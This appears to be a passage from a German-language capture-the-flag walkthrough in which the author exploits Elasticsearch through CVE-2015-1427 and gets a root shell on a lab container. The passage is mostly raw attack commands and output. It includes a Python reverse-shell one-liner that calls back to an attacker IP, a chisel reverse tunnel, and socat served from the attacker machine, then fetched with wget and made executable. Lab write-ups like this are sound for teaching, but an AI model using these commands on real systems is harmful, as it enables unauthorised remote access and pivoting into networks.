▒▓█ ▄ ▒██ ██▄▄▄▄██ ▒ ██▒ ▓██▓ ██▒▓▓▄ ▄██▒ ▒ ██▒▓█ ██ ▒▓█ ▄ ▒██ ▒██
▒████▒██████▒▓█ ▓██▒▒██████▒▒ ▒██▒ ██▒ ▓███▀ ▒██████▒▒▓█▒██▓▒████▒██████▒██████▒
▒ ▒▓ ▒▒ ▓▒█▒ ▒▓▒ ▒ ▒ ▓ ▒ ▒ ▒ ▒▓▒ ▒ ▒ ▒▒ ▒ ▒▓ ▒▓ ▒
▒ ▒ ▒▒ ▒ ▒ ▒ ▒ ▒ ▒ ▒ ▒ ▒
▒ ▒
Exploit for ElasticSearch , CVE-2015-1427 Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ id
uid=0(root) gid=0(root) groups=0(root)

Wir haben eine Root-Shell auf dem anderen System!

Privilege Escalation

Wir versuchen erneut, eine Reverse-Shell zu starten, um eine stabilere Verbindung zu erhalten.

┌──(root㉿CCat)-[~]
└─# python2 elasticsearch.py 192.168.2.199
▓█████ ██▓ ▄▄▄ ██████ ▄▄▄█████▓ ██▓ ▄████▄ ██████ ██ ██ ▓█████ ██▓ ██▓
▓█ ▀ ▓██▒ ▒████▄ ▒██ ▒ ▓ ██▒ ▓▒▓██▒▒██▀ ▀█ ▒██ ▒ ▓██ ██▒▓█ ▀ ▓██▒ ▓██▒
▒███ ▒██ ▒██ ▀█▄ ▓██▄ ▒ ▓██ ▒▒██▒▒▓█ ▄ ▓██▄ ▒██▀▀██▒███ ▒██ ▒██
▒▓█ ▄ ▒██ ██▄▄▄▄██ ▒ ██▒ ▓██▓ ██▒▓▓▄ ▄██▒ ▒ ██▒▓█ ██ ▒▓█ ▄ ▒██ ▒██
▒████▒██████▒▓█ ▓██▒▒██████▒▒ ▒██▒ ██▒ ▓███▀ ▒██████▒▒▓█▒██▓▒████▒██████▒██████▒
▒ ▒▓ ▒▒ ▓▒█▒ ▒▓▒ ▒ ▒ ▓ ▒ ▒ ▒ ▒▓▒ ▒ ▒ ▒▒ ▒ ▒▓ ▒▓ ▒
▒ ▒ ▒▒ ▒ ▒ ▒ ▒ ▒ ▒ ▒ ▒ ▒
▒ ▒
Exploit for ElasticSearch , CVE-2015-1427 Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ hostname -i
172.17.0.3

Wir versuchen erneut, eine Reverse-Shell mit Chisel zu starten.

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.199",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
./chisel client 192.168.2.199:1234 R:9200:172.17.0.3:9200
/app # ./chisel client 192.168.2.199:1234 R:9200:172.17.0.3:9200 &
/app # 2024/10/24 22:17:21 client: Connecting to ws://192.168.2.199:1234
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/app # 2024/10/24 22:17:46 client: Connection error: dial tcp 192.168.2.199:1234: connect: connection refused (Attempt: 8/unlimited)
2024/10/24 22:17:46 client: Retrying in 25.6s...
jobs
[1]+ Running ./chisel client 192.168.2.199:1234 R:9200:172.17.0.3:9200

Wir laden Socat auf das Zielsystem hoch.

┌──(root㉿CCat)-[/usr/bin]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.2.117 - - [25/Oct/2024 00:32:29] "GET /socat HTTP/1.1" 200 -
/app # wget 192.168.2.199/socat
Connecting to 192.168.2.199 (192.168.2.199:80)
socat 100% |******************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************| 462k 0:00:00 ETA
/app # chmod +x socat

Flags

Hier sind die Flags, die wir gefunden haben.

cat user.txt userflag
cat root.txt rootflag